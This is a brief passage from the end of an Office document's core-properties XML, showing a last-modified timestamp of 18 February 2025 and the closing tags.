  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-18T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>